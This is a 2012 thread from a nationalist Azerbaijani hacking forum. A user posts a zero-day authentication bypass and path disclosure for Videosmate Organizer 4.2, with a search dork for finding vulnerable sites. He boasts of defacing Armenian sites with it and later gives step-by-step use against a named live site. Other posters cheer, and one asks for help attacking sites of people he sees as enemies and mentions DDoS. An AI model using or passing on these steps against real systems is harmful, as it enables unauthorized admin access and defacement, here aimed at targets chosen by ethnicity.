Anti-armenia.ORG - Forumlar - Videosmate Organizer V 4.2 (all versions) 0day



Istifadəçi
    2012-10-17 00:00 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Keçən dəfə armpages.com-u vuranda bu tapdığımız vulnla vurmuşduq HERO_AZE ilə.
Bu gün də armnetwork.com-u bu yolla vurduq.

0day edirik artıq (nə tapdınız xaçiklərə aid vurun getsin dork da verdik)

http://pastebin.com/ZdWBCXmr

Kod:
    =====================================================================
    Vulnerable software: Videosmate Organizer V 4.2 (all versions)
    Vendor: http://videosmate.com/
    Software License: Commercial
    Vulns: Authentication Bypass & Path Disclosure
    Risk: Critical
    Dork: intext:Powered by Videosmate Organizer
    =====================================================================
    Vuln Description:
    As i noted above this script is commercial and that's why today i'm unable(may be lazy) to show you whereis vulnerability.
    I discovered this vulnerability while owning armenian sites.
    Flaw in that if the remote user is not authenticated against admin panel ( somesite.tld/sitedb/admin/ )
    it seems script (after session checking thing) is unable to properly kill it's execution.
    Since i have no access to source code of this script i'll try to imagine how this process goes:
     
     
    Suppose:
     
    <?php
    session_start();
     
    if (!isset($_SESSION['am_i_admin_or_am_i_logged_in_admin'])) echo "<script>self.location='login.php';</script>";
     
    /*
    Notice:
    echo 'JS_REDIRECTION';
     **        not  **
    die('JS_REDIRECTION');
    */
     
     
     
     
     
    /****** PWNED ********/
    //YOU ARE ADMIN HERE//
    ?>
     
     
    Exploitation is simple like 2x2:
     
    Disable javascript in your browser and follow to: site.tld/sitedb/admin/admin.php
    (If you wonder then press CTRL+U you will see somethink like:
     
    <script> self.location='login.php';</script>
    <script> self.location='login.php';</script>
    )
     
     
     
    Demo: http://www.videosmate.com/componentdemo/sitedb/admin/admin.php          (<=Disable javascript in your browser or use  NoScript then surf there)
     
     
     
    This is not end!! 111))
     
    PATH DISCLOSURE: Direct access to:
    site.tld/componentdemo/include/categoryfuncs.php
     
    Demo:
    http://www.videosmate.com/componentdemo/include/categoryfuncs.php
     
     
    Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
     
    Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
     
    Warning: include() [function.include]: Failed opening './settings/conf.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
     
    Warning: mysql_query() [function.mysql-query]: Access denied for user 'alphonse'@'localhost' (using password: NO) in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
     
    Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
    Error, query failed
     
     
     
     
    Please note that: I'm not responsible for any damage if the target site !='.am' domain xD))
     
     
    =====================================================================
     
    SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
    =====================================================================
    packetstormsecurity.org
    packetstormsecurity.com
    packetstormsecurity.net
    securityfocus.com
    cxsecurity.com
    security.nnov.ru
    securtiyvulns.com
    securitylab.ru
    secunia.com
    securityhome.eu
    exploitsdownload.com
    exploit-db.com
    osvdb.com
    websecurity.com.ua
     
    to all Aa Team + to all Azerbaijan Black HatZ +
          *Especially to my bro CAMOUFL4G3 *
    Also special thanks to: ottoman38 & HERO_AZE
    =====================================================================
     
    /AkaStep

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 08:51 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Təbrik

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 10:05 GMT                 

ynR !



VIP
Mesaj Sayı : 37
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 32
Mesaj :

Mövzunu Paylaş!


Eline sağlık




Mevzubahis Vatansa, Gerisi Teferruattır.


Mustafa Kemal Atatürk


Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 10:28 GMT                 

FARO15ful



VIP
Mesaj Sayı : 284
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 27
Mesaj :

Mövzunu Paylaş!


Əla)) nice bro.. respect

Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 12:44 GMT                 

TheConficker



VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


əla bro qəşəy ləzzət edirdə mənə bu xaçiklərə geydirəndə

http://exploitarchive.com/videosmate-organizer-4-2-authentication-bypass-path-disclosure/

Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 13:09 GMT                 

Frozen



İstifadəçi
Mesaj Sayı : 135
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Başa düşmədim. Vide çəksəz sevinərəm. Mən Azərbaycana və İslama qarşı olanların saytını vurmaq istəyirəm. Amma Sql zad bilirəm bir də ki upload açığı xpoll zad . Az şey bildiyim üçün vura bilmirəm mən də ddos edirəm backtracknan amma onun da diski işləmir gərəy təzdən yazım. Video çəkib başa salsaz mən də azdan çoxdan oların saytını vuraram.

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 14:31 GMT                 

AzSecurity



Gold
Mesaj Sayı : 122
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   5  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Linux sys admin
Yaş :
Mesaj :

Mövzunu Paylaş!


Təbriklər

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 19:18 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər hər birinizə.Minnətdaram

@Frozen Video çəkə bilmərəm.
Ingilis dilini öyrən ya google translate istifadə et.
Dırkanın orda gözəlliyi odurki brauzerində javascripti disable etməklə + adminkaya surf etməklə avtomatik adminkada olursan.Admin olursan.Sonrası da vurursan gedir.
Bircə onu deməki brauzerdə javascripti necə disable edim...

Demo 1 sənin üçün:
Brauzerində javascripti disable et(bilmirsənsə necə edrlər bunu google-dan yararlan)
və bura daxil ol:

http://armnetwork.com/sitedb/admin//admin.php
Artıq adminsən.


Bu da reference-lər:

http://packetstormsecurity.org/files/117421/Videosmate-Organizer-4.2-Authentication-Bypass-Path-Disclosure.html

http://cxsecurity.com/issue/WLB-2012100144

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 19:53 GMT                 

M4NY3T!K



Gold
Mesaj Sayı : 606
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Naxçıvan
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təbriklər Bro

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-10-17 21:49 GMT                 

Avatar Fearless



VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Respect !

Gözəl başdan ayağa 2-3 dəfə oxudum heç sıxılmadan hər dəfə oxuyanda daha çox başa düşdüm Təşəkkürlər

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG